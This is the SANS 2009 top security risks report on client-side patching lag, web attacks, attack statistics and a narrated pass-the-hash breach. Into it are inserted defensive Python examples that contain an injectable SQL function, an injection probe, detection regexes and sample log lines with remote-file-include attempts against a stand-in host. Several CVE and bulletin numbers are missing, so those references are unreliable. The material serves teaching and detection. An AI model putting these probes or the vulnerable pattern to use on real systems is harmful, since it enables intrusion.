Priority One: Client-side software that remains unpatched. Priority Two: Internet-facing web sites that are vulnerable.
1 SANS: of 3 5/6/ :20

Priority One: Client-side software that remains unpatched.

Waves of targeted attacks, often called spear phishing, are exploiting client-side vulnerabilities in commonly used programs such as Adobe PDF Reader, QuickTime, Adobe Flash and Microsoft Office. This is currently the primary initial infection vector used to compromise computers that have Internet access. Those same client-side vulnerabilities are exploited by attackers when users visit infected web sites (see Priority Two below for how the web sites are compromised). Because visitors feel safe downloading documents from trusted sites, they are easily fooled into opening documents, music and video that exploit client-side vulnerabilities. Some exploits do not even require the user to open a document: simply accessing an infected website is enough to compromise the client software. The victims' infected computers are then used to propagate the infection and compromise other internal computers and sensitive servers incorrectly thought to be protected from unauthorized access by external entities. In many cases, the ultimate goal of the attacker is to steal data from the target organizations and to install back doors through which the attackers can return for further exploitation. On average, major organizations take at least twice as long to patch client-side vulnerabilities as they take to patch operating system vulnerabilities. In other words, the highest-priority risk is getting less attention than the lower-priority risk.

Priority Two: Internet-facing web sites that are vulnerable.

Attacks against web applications constitute more than 60% of the total attack attempts observed on the Internet. These vulnerabilities are being exploited widely to convert trusted web sites into malicious websites serving content that contains client-side exploits.
Web application vulnerabilities such as SQL injection and Cross-Site Scripting flaws in open-source as well as custom-built applications account for more than 80% of the vulnerabilities being discovered. Despite the enormous number of attacks and despite widespread publicity about these vulnerabilities, most web site owners fail to scan effectively for the common flaws and become unwitting tools used by criminals to infect the visitors who trusted those sites to provide a safe web experience.

Operating systems continue to have fewer remotely exploitable vulnerabilities that lead to massive Internet worms. Other than Conficker/Downadup, no new major worms for OSs were seen in the wild during the reporting period. Even so, the number of attacks against buffer overflow vulnerabilities in Windows tripled from May-June to July-August and constituted over 90% of attacks seen against the Windows operating system.

Rising numbers of zero-day vulnerabilities

World-wide there has been a significant increase over the past three years in the number of people discovering zero-day vulnerabilities, as measured by multiple independent teams discovering the same vulnerabilities at different times. Some vulnerabilities have remained unpatched for as long as two years. There is a corresponding shortage of highly skilled vulnerability researchers working for government and software vendors. So long as that shortage exists, the defenders will be at a significant disadvantage in protecting their systems against zero-day attacks.

A large decline in the number of "PHP File Include" attacks appears to reflect improved processes used by application developers, system administrators, and other security professionals.
Application Vulnerabilities Exceed OS Vulnerabilities

During the last few years, the number of vulnerabilities discovered in applications has been far greater than the number discovered in operating systems. As a result, more exploitation attempts are recorded against application programs. The most "popular" applications for exploitation tend to change over time, since the rationale for targeting a particular application often depends on factors like prevalence or the inability to patch effectively. Due to the current trend of converting trusted web sites into malicious servers, browsers and the client-side applications that can be invoked by browsers seem to be consistently targeted.

Figure 1: Number of Vulnerabilities in Network, OS and Applications

Web Application Attacks

There appear to be two main avenues for exploiting and compromising web servers: brute-force password guessing attacks and web application attacks. Microsoft SQL, FTP, and SSH servers are popular targets for password guessing attacks because of the access that is gained if a valid username/password pair is identified. SQL Injection, Cross-site Scripting and PHP File Include attacks continue to be the three most popular techniques used for compromising web sites. Automated tools, designed to target custom web application vulnerabilities, make it easy to discover and infect several thousand web sites.

Windows: Conficker/Downadup

Attacks on Microsoft Windows operating systems were dominated by Conficker/Downadup worm variants.
For the past six months, over 90% of the attacks recorded for Microsoft targeted the buffer overflow vulnerability described in the Microsoft Security Bulletin MS. Although in much smaller proportion, Sasser and Blaster, the infamous worms from 2003 and 2004, continue to infect many networks.

Figure 2: Attacks on Critical Microsoft Vulnerabilities (last 6 months)
Origin and Destination Analysis for Four Key Attacks

Over the past six months, we have seen some very interesting trends when comparing the country where various attacks originate to the country of the attack destination. To show these results, we have characterized and presented the data in relation to the most prevalent attack categories. The analysis performed for this report identified these attack categories as high-risk threats to most if not all networks, and as such they should be at the forefront of security practitioners' minds. These categories are Server-Side HTTP attacks, Client-Side HTTP attacks, PHP Remote File Include, Cross-site Scripting attacks, and finally SQL Injection attacks. As you might expect, there is some overlap in these categories, with the latter three being subsets of the first two. However, the trends we see in separating this data are worth pointing out.

The SQL Injection attacks that compose this category include "SQL Injection using SELECT SQL Statement", "SQL Injection Evasion using String Functions", and "SQL Injection using Boolean Identity". The most prominent "PHP Remote File Include attack" is one that looks for a very small HTTP request that includes a link to another website as a parameter and contains a very specific evasion technique used by a number of attacks to increase their reliability. Also of note is a very specific attack against the "Zeroboard PHP" application, the only single application that made the top attacks. The final type of attack included in these statistics is one of the more popular "HTTP Connect Tunnel" attacks, which remains a staple in the Server-Side HTTP category. HTTP connect tunnels are used for sending spam e-mails via mis-configured HTTP servers. Looking at the breakdown by country, we see that the United States is by far the major attack target for the Server-Side HTTP attack category (Figure 5).
Figure 5: Server-Side HTTP Attacks by Destination Country (last 6 months)

For years, attack targets in the United States have presented greater value propositions for attackers, so this statistic really comes as no surprise. An interesting spike in Server-Side HTTP attacks occurred in July. This was entirely due to SQL Injection attacks using the SELECT command. Upon looking at the data, we saw a massive campaign by a range of IP addresses located at a very large Internet Service Provider (ISP). In this case, a number of machines located at a single colocation site may all have been compromised through the same vulnerability because the machines were at the same patch level. In addition, a number of gambling sites took part in this attack, which peaked after hours on July Fourth, a major holiday in the United States.
Figure 6: Server-Side HTTP Attacks (last 6 months)

Finally, let's turn to the source of these HTTP Server-Side attacks (Figure 7).

Figure 7: Server-Side HTTP Attacks by Source Country (last 6 months)

Here we see the United States as by far the largest origin, which is a pattern that has continued for some time. In many cases we believe these to be compromised machines that are then being used for further nefarious purposes. The next four offenders on the HTTP Server-Side attacking countries list are Thailand, Taiwan, China, and the Republic of Korea. They also show up in other portions of this report, so this graph will be a useful reference in comparing some of the other attack categories and their relative magnitude.

The last six months have seen a lot of activity with SQL injection attacks. Some typical patterns emerge, with the United States being both the top source of and destination for SQL Injection events. SQL Injection on the Internet can more or less be divided into two sub-categories: legitimate SQL Injection and malicious SQL Injection. Many web applications on the Internet still use "SQL Injection" for their normal functionality; the difference is only one of intent. The web applications that legitimately use SQL Injection are guaranteed to be vulnerable to the tools and techniques used by attackers to perform malicious SQL Injections. The servers that house these applications may have a higher compromise rate not only because they are known to be vulnerable, but also because they need to distinguish between legitimate and malicious injects to identify attacks.
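The two halves of the problem described above, as an added example that is not part of the SANS report: an application that builds SQL by concatenating the request value is "guaranteed to be vulnerable" because the value becomes SQL syntax, whereas binding it as a parameter keeps it data. The block also includes a coarse request-side matcher for the three injection categories the report names (SELECT statements, string-function evasion, boolean identities), which is the kind of check a server operator needs in order to tell legitimate from malicious injects in their logs. The database, table, rows and probe strings are constructed for the demonstration; the function names are assumptions.

```python
# Added example (not from the SANS report): concatenated vs. parameterized
# SQL, plus a coarse matcher for the injection patterns the report names.
# The database contents and probe strings are constructed for the demo.
import re
import sqlite3


def make_db():
    """In-memory SQLite database with a handful of constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (name, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn


def find_user_vulnerable(conn, name):
    """Builds SQL by string concatenation: the caller's text becomes SQL syntax."""
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """Binds the value as a parameter: it can only ever be compared as data."""
    return conn.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


# Request-side patterns for the three categories named in the report:
# SELECT statements, string-function evasion, and boolean identities.
INJECTION_PATTERNS = {
    "select_statement": re.compile(r"\bselect\b.+\bfrom\b", re.I | re.S),
    "string_functions": re.compile(r"\b(char|chr|concat|substr|substring)\s*\(", re.I),
    "boolean_identity": re.compile(r"\bor\b\s*'?\w+'?\s*=\s*'?\w+'?", re.I),
}


def classify_input(value):
    """Return the names of the injection patterns a request value matches."""
    return [name for name, rx in INJECTION_PATTERNS.items() if rx.search(value)]


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"  # constructed boolean-identity input
    print(find_user_vulnerable(db, probe))  # every row comes back
    print(find_user_safe(db, probe))        # no user has that literal name
    print(classify_input(probe))            # ['boolean_identity']
```

The matcher is deliberately coarse: a legitimate value such as a surname with an apostrophe does not trip it, but a search field that genuinely receives SQL fragments (the "legitimate SQL Injection" case above) will, which is exactly why those servers cannot separate attacks from normal traffic by pattern alone.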
Figure 8: SQL Injection Attacks by Destination Country (last 6 months)

Looking at the magnitude of these attacks broken down by month (Figure 9), we see the large-scale SQL Injection campaign pointed out in the Server-Side HTTP Attack section. A very large spike in SQL Injection attacks in July was caused mostly by an online advertiser who distributed code to many affiliates using SQL injection as functionality. The application was quickly pulled, resulting in a large drop in events for the month of August.

Figure 9: SQL Injection Attacks (last 6 months)

The source distribution of many of these attacks is much more diverse than the destination. China is now the single largest source outside of the United States. Again, the overwhelming destination for these events is the United States (Figure 10).
Figure 10: SQL Injection Attacks by Source Country (last 6 months)

In conclusion, we cannot overstate the importance of protecting DMZ-based web applications from SQL Injection attacks. Increasingly, the ultimate objective of attackers is the acquisition of sensitive data. While the media may consistently report attacker targets as being credit cards and social security numbers, that is more due to the popular understanding of the marketability of this data; they are not the only valuable data types that can be compromised. Since SQL Injection attacks offer such easy access to data, it should be assumed that any valuable data stored in a database accessed by a web server is being targeted.

Although "PHP File Include" attacks have been popular, we have seen a notable decline in the overall number of attacks that have taken place. With the exception of a major attack originating from Thailand in April, the number of PHP File Include attacks in August is less than half the March/May average. There are many ways to protect against these attacks. Apache configuration, input sanitization, and network security equipment are all very good at deterring these attacks, so it seems likely that the drop in total attacks is at least partly due to a positive response by application developers, system administrators, and security professionals. However, due to the extreme ease with which these attacks are carried out, and the enormous benefit of a successful attack (arbitrary PHP code is executed), attacks such as these are likely to remain popular for some time.

Figure 11: PHP Remote File Include Attacks (last 6 months)

Let us look at the sources of "PHP Remote File Include" attacks. A major attack campaign was launched out of Thailand in April that caused Thailand to show up at number 1 in this list.
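The "very small HTTP request that includes a link to another website as a parameter" described earlier is easy to spot in web server logs, and log review is one of the cheap detections alongside the Apache configuration and input sanitization mentioned above. The following is an added example, not code from the SANS report: it parses Apache combined-format access log lines, flags any request whose decoded query parameter starts with a remote URL scheme, and counts hits per source address. The log lines, hosts, paths and function names are constructed for the demonstration.

```python
# Added example (not from the SANS report): flag web requests whose query
# parameter carries an absolute URL, the tell-tale shape of a PHP Remote File
# Include attempt, and summarize hits per source. Everything below (log lines,
# addresses, paths) is constructed for the demonstration.
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [14/Aug/2009:03:12:01 +0000] "GET /index.php?page=http://198.51.100.7/c.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
192.0.2.44 - - [14/Aug/2009:03:12:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Aug/2009:03:12:09 +0000] "GET /board/zboard.php?dir=ftp://198.51.100.7/x HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
192.0.2.10 - - [14/Aug/2009:03:13:00 +0000] "GET /search.php?q=http%3A%2F%2Fexample.org HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identity, user, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# URL schemes and stream wrappers that should never appear as a page selector.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")


def remote_url_params(target):
    """Return (name, value) pairs whose decoded value starts with a remote scheme.

    parse_qsl decodes percent-encoding, so an encoded http%3A%2F%2F is caught too.
    """
    query = urlsplit(target).query
    return [(n, v) for n, v in parse_qsl(query, keep_blank_values=True)
            if v.lower().startswith(REMOTE_SCHEMES)]


def find_rfi_attempts(log_text):
    """One finding per request that carries a remote URL in a query parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-matching line: skip, never crash the sweep
        for name, value in remote_url_params(m.group("target")):
            findings.append({
                "src": m.group("src"),
                "ts": m.group("ts"),
                "path": urlsplit(m.group("target")).path,
                "param": name,
                "value": value,
                "status": int(m.group("status")),
            })
    return findings


def hits_per_source(log_text):
    """Count findings by source address so repeat offenders surface first."""
    return Counter(f["src"] for f in find_rfi_attempts(log_text))


if __name__ == "__main__":
    for finding in find_rfi_attempts(SAMPLE_ACCESS_LOG):
        print(finding)
    print(hits_per_source(SAMPLE_ACCESS_LOG).most_common())
```

The fourth constructed line is a deliberate false positive: a search box that received a URL as its query. A remote URL in a parameter named `page`, `dir`, `file` or `include` is far more telling than one in a free-text field, so in production the finding's `path` and `param` are what you would use to rank or filter before alerting.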
Figure 12: PHP Remote File Include Attacks by Source Country (last 6 months)

Cross Site Scripting (XSS) is one of the most prevalent bugs in today's web applications. Unfortunately, developers often fall into the trap of introducing XSS bugs while creating custom code that connects all of the diverse web technologies that are so prevalent in today's Web 2.0 world. Another very common "use" of XSS is by various advertisers' analytic systems. For example, an advertiser's banner might be embedded in a web page which is set up to reflect some JavaScript off of the advertiser's HTTP server for tracking purposes. In this case, however, there is little risk because the site in question (usually) has full control over its own page, so this request to the advertiser is not generally malicious. It is the "reflection" attacks, along with attacks that leverage flaws in form data handling, that make up the vast majority of XSS attacks that we have seen in the last six months.

Figure 13: XSS Attacks by Source Country (last 6 months)

Attacks sourced from the United States have been on a steady decline month-over-month. The Republic of Korea has seen a 50% reduction in the last 30 days. These two events, however, have been offset by a sudden 20% increase in the last 30 days in attacks from Australia. The other three major players, namely Hong Kong, China and Taiwan, have remained stable over the past three months in this category.

The SANS Institute Web Privacy Policy Web Contact Link to Us Press Room Trademark Usage Policy Contact us: (301) 654-SANS(7267) Monday - Friday 9am-8pm EST/EDT
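The "reflection" flaw named in the XSS discussion above, as an added example that is not part of the SANS report: a search handler that echoes the query into the page without encoding, the same handler with context-aware escaping, and a small self-check a site owner can run against their own handlers (the report notes that most owners fail to scan for exactly these common flaws). The handlers, the probe string and the function names are constructed for the demonstration.

```python
# Added example (not from the SANS report): reflected XSS in a search page,
# its escaped counterpart, and a self-check for unencoded reflection.
# Handlers and probe strings are constructed for the demonstration.
from html import escape


def render_results_unsafe(query, hits):
    """Reflects the raw query into the page: markup in the query becomes markup."""
    items = "".join(f"<li>{h}</li>" for h in hits)
    return f"<p>Results for: {query}</p><ul>{items}</ul>"


def render_results_safe(query, hits):
    """Escapes everything reflected; quote=True also covers attribute values."""
    q = escape(query, quote=True)
    items = "".join(f"<li>{escape(h, quote=True)}</li>" for h in hits)
    # The same escaped value is safe both in element text and in a quoted attribute.
    return f'<p>Results for: {q}</p><input name="q" value="{q}"><ul>{items}</ul>'


# Every character that HTML text and attribute contexts treat as syntax.
PROBE = "<\"'&>"


def reflects_raw(render):
    """True if a handler echoes the probe unchanged, i.e. without encoding.

    Feed the probe through the handler with no other data and look for it verbatim.
    """
    return PROBE in render(PROBE, [])


if __name__ == "__main__":
    print(render_results_unsafe("<b>term</b>", ["one"]))   # tag survives intact
    print(render_results_safe("<b>term</b>", ["one"]))     # tag becomes &lt;b&gt;
    print(reflects_raw(render_results_unsafe), reflects_raw(render_results_safe))
```

Note that the safe handler also escapes the stored hits, not just the query: the "flaws in form data handling" the report mentions are the stored variant of the same mistake, where data written earlier is reflected later to a different visitor.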
Application Patching is Much Slower than Operating System Patching

Qualys scanners collect anonymized data on detected vulnerabilities to capture the changing dynamics in the vulnerability assessment field. The data documents changes such as the decline of server-side vulnerabilities and the corresponding rise of vulnerabilities on the client side, both in operating system components and in applications. A Top 30 ranking is often used to see if major changes occur in the most frequently found vulnerabilities. Here is the ranking for the first half of 2009, edited to remove irrelevant data points such as 0-day vulnerabilities.

1. WordPad and Office Text Converters Remote Code Execution Vulnerability (MS09-010)
2. Sun Java Multiple Vulnerabilities ( and others)
3. Sun Java Web Start Multiple Vulnerabilities May Allow Elevation of Privileges (238905)
4. Java Runtime Environment Virtual Machine May Allow Elevation of Privileges (238967)
5. Adobe Acrobat and Adobe Reader Buffer Overflow (APSA09-01)
6. Microsoft SMB Remote Code Execution Vulnerability (MS09-001)
7. Sun Java Runtime Environment GIF Images Buffer Overflow Vulnerability
8. Microsoft Excel Remote Code Execution Vulnerability (MS09-009)
9. Adobe Flash Player Update Available to Address Security Vulnerabilities (APSB09-01)
10. Sun Java JDK JRE Multiple Vulnerabilities (254569)
11. Microsoft Windows Server Service Could Allow Remote Code Execution (MS08-067)
12. Microsoft Office PowerPoint Could Allow Remote Code Execution (MS09-017)
13. Microsoft XML Core Services Remote Code Execution Vulnerability (MS08-069)
14. Microsoft Visual Basic Runtime Extended Files Remote Code Execution Vulnerability (MS08-070)
15. Microsoft Excel Multiple Remote Code Execution Vulnerabilities (MS08-074)
16. Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (MS09-028)
17. Microsoft Word Multiple Remote Code Execution Vulnerabilities (MS08-072)
18. Adobe Flash Player Multiple Vulnerabilities (APSB07-20)
19. Adobe Flash Player Multiple Security Vulnerabilities (APSB08-20)
20. Third Party CAPICOM.DLL Remote Code Execution Vulnerability
21. Microsoft Windows Media Components Remote Code Execution Vulnerability (MS08-076)
22. Adobe Flash Player Multiple Vulnerabilities (APSB07-12)
23. Microsoft Office Remote Code Execution Vulnerability (MS08-055)
24. Adobe Reader JavaScript Methods Memory Corruption Vulnerability (APSA09-02 and APSB09-06)
25. Microsoft PowerPoint Could Allow Remote Code Execution (MS08-051)
26. Processing Font Vulnerability in JRE May Allow Elevation of Privileges (238666)
27. Microsoft Office Could Allow Remote Code Execution (MS08-016)
28. Adobe Acrobat/Reader "util.printf()" Buffer Overflow Vulnerability (APSB08-19)
29. Adobe Acrobat and Adobe Reader Multiple Vulnerabilities (APSB08-15)
30. Windows Schannel Security Package Could Allow Spoofing Vulnerability (MS09-007)

Table 1: Qualys Top 30 for the first half of 2009

Some of the vulnerabilities listed in the table are quickly addressed by IT administrators; vulnerabilities in the base operating system class, for example, show a significant drop even in the first 15 days of their lifetime:
Figure 14: Microsoft OS Vulnerabilities

But at least half of the vulnerabilities in the list, primarily vulnerabilities found in applications, receive less attention and get patched on a much slower timeline. Some of these applications, such as Microsoft Office and Adobe Reader, are very widely installed and so expose the many systems they run on to long-lived threats. The following graphs plot the number of vulnerabilities detected for Microsoft Office and Adobe Reader, normalized to the maximum number of vulnerabilities detected in the timeframe. Periodic drops in detection rates occur during weekends, when scanning focuses on servers rather than desktop machines and the detection rates of vulnerabilities related to desktop software fall accordingly.

Figure 15: Microsoft PowerPoint and Adobe Vulnerabilities Patching Cycles

Attackers have long picked up on this opportunity and have switched to different types of attacks in order to take advantage of these vulnerabilities, using social engineering techniques to lure end-users into opening documents received by e-mail, or infecting websites with links to documents that have attacks for these vulnerabilities embedded. These infected documents are not only placed on popular web sites that have a large number of visitors, but increasingly target the "long tail", the thousands of specialized websites that have smaller but very faithful audiences. By identifying and exploiting vulnerabilities in the Content Management Systems used by these sites, attackers can automate the infection process and reach thousands of sites in a matter of hours. Attacks using PDF vulnerabilities saw a large increase in late 2008 and 2009 as it became clear to attackers how easy it is to use this method of getting control over a machine.
Adobe Flash has similar problems with the application of its updates; there are four Flash vulnerabilities in our Top 30 list that date back as far as 2007:

Figure 16: Flash Vulnerabilities

Flash presents additional challenges: it does not have its own automatic update mechanism, and one needs to patch Internet Explorer in a separate step from the other browsers. For users that have more than one browser installed, it is quite easy to forget to close the Flash vulnerabilities completely and so remain unwittingly vulnerable. One of the other software families that is high on the Top 30 list is Java, which is widely installed for running Java applets in the common browsers and also, increasingly, for normal applications. Its patch cycle is quite slow, with the total number of vulnerabilities actually increasing as the introduction of new vulnerabilities outweighs the effect of patching. Java has the additional problem that until recently new versions did not uninstall the older code, but only pointed default execution paths to the new, fixed version; attack code could be engineered to take advantage of the well-known paths and continue to use older and vulnerable Java engines.
Figure 17: Sun Java Vulnerabilities
Real-Life HTTP Client-Side Exploitation Example

This section illustrates an example of a real-life attack conducted against an organization that resulted in the loss of critical data. In this attack, Acme Widgets Corporation suffered a major breach from attackers who were able to compromise their entire internal network infrastructure using two of the most powerful and common attack vectors today: exploitation of client-side software and pass-the-hash attacks against Windows machines.

Step 0: Attacker Places Content on Trusted Site

In Step 0, the attacker begins by placing content on a trusted third-party website, such as a social networking, blogging, photo sharing, or video sharing website, or any other web server that hosts content posted by public users. The attacker's content includes exploitation code for unpatched client-side software.

Step 1: Client-Side Exploitation

In Step 1, a user on the internal Acme Widgets enterprise network surfs the Internet from a Windows machine that is running an unpatched client-side program, such as a media player (e.g., RealPlayer, Windows Media Player, iTunes, etc.), a document display program (e.g., Acrobat Reader), or a component of an office suite (e.g., Microsoft Word, Excel, PowerPoint, etc.). Upon receiving the attacker's content from the site, the victim user's browser invokes the vulnerable client-side program, passing it the attacker's exploit code. This exploit code allows the attacker to install or execute programs of the attacker's choosing on the victim machine, using the privileges of the user who ran the browser. The attack is partially mitigated because this victim user does not have administrator credentials on this system. Still, the attacker can run programs with those limited user privileges.
Step 2: Establish Reverse Shell Backdoor Using HTTPS

In Step 2, the attacker's exploit code installs a reverse shell backdoor program on the victim machine. This program gives the attacker command shell access to the victim machine, communicating between this system and the attacker using outbound HTTPS access from victim to attacker. The backdoor traffic therefore appears to be regular encrypted outbound web traffic as far as the enterprise firewall and network are concerned.
Steps 3 & 4: Dump Hashes and Use Pass-the-Hash Attack to Pivot

In Step 3, the attacker uses shell access on the initial victim system to load a local privilege escalation exploit program onto the victim machine. This program allows the attacker to jump from the limited-privilege user account to full system privileges on this machine. Although vendors frequently release patches to stop local privilege escalation attacks, many organizations do not deploy such patches quickly, because such enterprises tend to focus exclusively on patching remotely exploitable flaws. The attacker now dumps the password hashes for all accounts on this local machine, including a local administrator account on the system.

In Step 4, instead of cracking the local administrator password, the attacker uses a Windows pass-the-hash program to authenticate to another Windows machine on the enterprise internal network, a fully patched client system on which this same victim user has full administrative privileges. Using NTLMv1 or NTLMv2, Windows machines authenticate network access for the Server Message Block (SMB) protocol based on user hashes and not the passwords themselves, allowing the attacker to get access to the file system or run programs on the fully patched system with local administrator privileges. Using these privileges, the attacker now dumps the password hashes for all local accounts on this fully patched Windows machine.

Step 5: Pass the Hash to Compromise Domain Controller

In Step 5, the attacker uses a password hash from a local account on the fully patched Windows client to access the domain controller system, again using a pass-the-hash attack to gain shell access on the domain controller. Because the password for the local administrator account is identical to the password for a domain administrator account, the password hashes for the two accounts are identical.
Therefore, the attacker can access the domain controller with full domain administrator privileges, giving the attacker complete control over all other accounts and machines in that domain.

Steps 6 and 7: Exfiltration

In Step 6, with full domain administrator privileges, the attacker now compromises a server machine that stores secrets for the organization. In Step 7, the attacker exfiltrates this sensitive information, consisting of over 200 megabytes of data. The attacker pushes this data out to the Internet from the server, again using HTTPS to encrypt the information, minimizing the chance of it being detected.
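Steps 2 and 7 above rely on the backdoor and the exfiltration looking like ordinary encrypted web traffic to the firewall. The content is opaque, but the timing is not: a reverse shell that polls its controller tends to connect at near-fixed intervals, while a person browsing does not. The following is an added example, not code from the SANS report: it groups outbound HTTPS CONNECT entries from a proxy log by client and destination and flags pairs whose inter-connection gaps have a low coefficient of variation. The log format, timestamps, addresses, thresholds and function names are constructed for the demonstration.

```python
# Added example (not from the SANS report): find outbound HTTPS connections
# that recur at near-fixed intervals, the traffic shape of a reverse-shell
# backdoor that tunnels over HTTPS. Log lines, hosts and addresses are
# constructed for the demonstration.
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log: timestamp, client, destination, method, status.
# 198.51.100.20 is polled roughly once a minute; 203.0.113.9 is ordinary browsing.
SAMPLE_PROXY_LOG = """\
2009-07-04T22:00:00 10.1.5.23 198.51.100.20:443 CONNECT 200
2009-07-04T22:00:31 10.1.5.23 203.0.113.9:443 CONNECT 200
2009-07-04T22:01:01 10.1.5.23 198.51.100.20:443 CONNECT 200
2009-07-04T22:02:00 10.1.5.23 198.51.100.20:443 CONNECT 200
2009-07-04T22:02:47 10.1.5.23 203.0.113.9:443 CONNECT 200
2009-07-04T22:03:00 10.1.5.23 198.51.100.20:443 CONNECT 200
2009-07-04T22:04:02 10.1.5.23 198.51.100.20:443 CONNECT 200
2009-07-04T22:05:00 10.1.5.23 198.51.100.20:443 CONNECT 200
2009-07-04T22:09:12 10.1.5.23 203.0.113.9:443 CONNECT 200
"""


def connections_by_pair(log_text):
    """Map (client, destination) to a sorted list of connection timestamps."""
    pairs = defaultdict(list)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed lines rather than abort the sweep
        ts, src, dst, _method, _status = fields
        pairs[(src, dst)].append(datetime.fromisoformat(ts))
    for times in pairs.values():
        times.sort()
    return pairs


def beacon_candidates(log_text, min_connections=5, max_cv=0.1):
    """Return (src, dst, mean_gap_seconds, cv) for pairs with regular timing.

    cv is the coefficient of variation (stdev / mean) of the gaps between
    successive connections; a human browsing session scores far above 0.1,
    a timer-driven poller far below it.
    """
    found = []
    for (src, dst), times in connections_by_pair(log_text).items():
        if len(times) < min_connections:
            continue  # too few samples to say anything about regularity
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else 0.0
        if cv <= max_cv:
            found.append((src, dst, avg, round(cv, 3)))
    return found


if __name__ == "__main__":
    for src, dst, avg, cv in beacon_candidates(SAMPLE_PROXY_LOG):
        print(f"{src} -> {dst}: every {avg:.0f}s (cv={cv})")
```

The thresholds are starting points, not tuned values: software updaters and mail clients also poll on timers, so in practice the candidate list is joined against an allow-list of known destinations and against the process or user that owns the session, which is where the audit logging and account monitoring controls discussed later come in.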
A zero-day vulnerability occurs when a flaw in software code is discovered and code exploiting the flaw appears before a fix or patch is available. Once a working exploit of the vulnerability has been released into the wild, users of the affected software will continue to be compromised until a software patch is available or some form of mitigation is taken by the user. "File Format Vulnerabilities" continue to be the first choice for attackers conducting zero-day and targeted attacks. Most of the attacks continue to target Adobe PDF, Flash Player and Microsoft Office Suite (PowerPoint, Excel and Word) software. Multiple publicly available "fuzzing" frameworks make it easier to find these flaws. The vulnerabilities are often found in third-party add-ons to these popular and widespread software suites, making the patching process more complex and increasing their potential value to attackers.

The notable zero-day vulnerabilities during the past 6 months were:

- Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE )
- Microsoft Office Web Components ActiveX Control Code Execution Vulnerability (CVE )
- Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (CVE )
- Microsoft DirectX DirectShow QuickTime Video Remote Code Execution Vulnerability (CVE )
- Adobe Reader Remote Code Execution Vulnerability (CVE )
- Microsoft PowerPoint Remote Code Execution Vulnerability (CVE )

The ease of finding zero-day vulnerabilities is a direct result of an overall increase in the number of people world-wide having the skills to discover vulnerabilities. This is evidenced by the fact that TippingPoint DVLabs often receives the same vulnerabilities from multiple sources. For example, MS (Microsoft Internet Explorer DOM Object Heap Overflow Vulnerability) was discovered independently by three researchers.
The first researcher submitted the remote IE 6/7 critical vulnerability on Oct 22. A second independent researcher submitted the same vulnerability on April 23. A third independent researcher submitted the same vulnerability on May 19. All three submissions outlined different approaches to auditing and finding the same vulnerability. The implication of increasing duplicate discoveries is fairly alarming, in that the main mitigation for vulnerabilities of this type is patching, which is an invalid strategy for protecting against zero-day exploits. There is a heightened risk from cyber criminals, who can discover zero-day vulnerabilities and exploit them for profit. Add to this that software vendors have not necessarily lowered their average time for patching vulnerabilities reported to them, and that TippingPoint is aware of a number of vulnerabilities that were reported to vendors two years ago and are still awaiting a patch. This makes zero-day exploits in client-side applications one of the most significant threats to your network, and requires that you put in place additional information security measures and controls to complement your vulnerability assessment and remediation activities.
Best Practices

A few weeks ago, the Center for Strategic and International Studies published an updated version of the Twenty Critical Controls for Effective Cyber Defense. These controls reflect the consensus of many of the nation's top cyber defenders and attackers on which specific controls must be implemented first to mitigate known cyber threats. One of the most valuable uses of this report is to help organizations deploying the Twenty Critical Security Controls to be certain that no critical new attacks have been found that would force substantial changes in the Twenty Controls, and at the same time to help people who are implementing the Twenty Critical Security Controls to focus their attention on the elements of the controls that need to be completed most immediately.

The Key Elements of these attacks and associated Controls:

- User applications have vulnerabilities that can be exploited remotely. Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable software is accounted for, identified for defensive planning, and remediated in a timely manner. Control 5 (Boundary Defenses) can provide some prevention/detection capability when attacks are launched.
- There is an increasing number of zero-days in these types of applications. Control 12 (Malware Defenses) is the most effective at mitigating many of these attacks because it can ensure that malware entering the network is effectively contained. Controls 2, 3, and 10 have minimal impact on zero-day exploits, and Control 5 can provide some prevention/detection capabilities against zero-days as well as known exploits.
- Successful exploitation grants the attacker the same privileges on the network as the user and/or host that is compromised. Control 5 (Boundary Defenses) can ensure that compromised host systems (portable and static) can be contained. Controls 8 (Controlled Use of Administrative Privileges) and 9 (Controlled Access) limit what access the attacker has inside the enterprise once they have successfully exploited a user application.
- The attacker is masquerading as a legitimate user but is often performing actions that are not typical for that user. Controls 6 (Audit Logs) and 11 (Account Monitoring and Control) can help identify potentially malicious or suspicious behavior, and Control 18 (Incident Response Capability) can assist in both detection and recovery from a compromise.
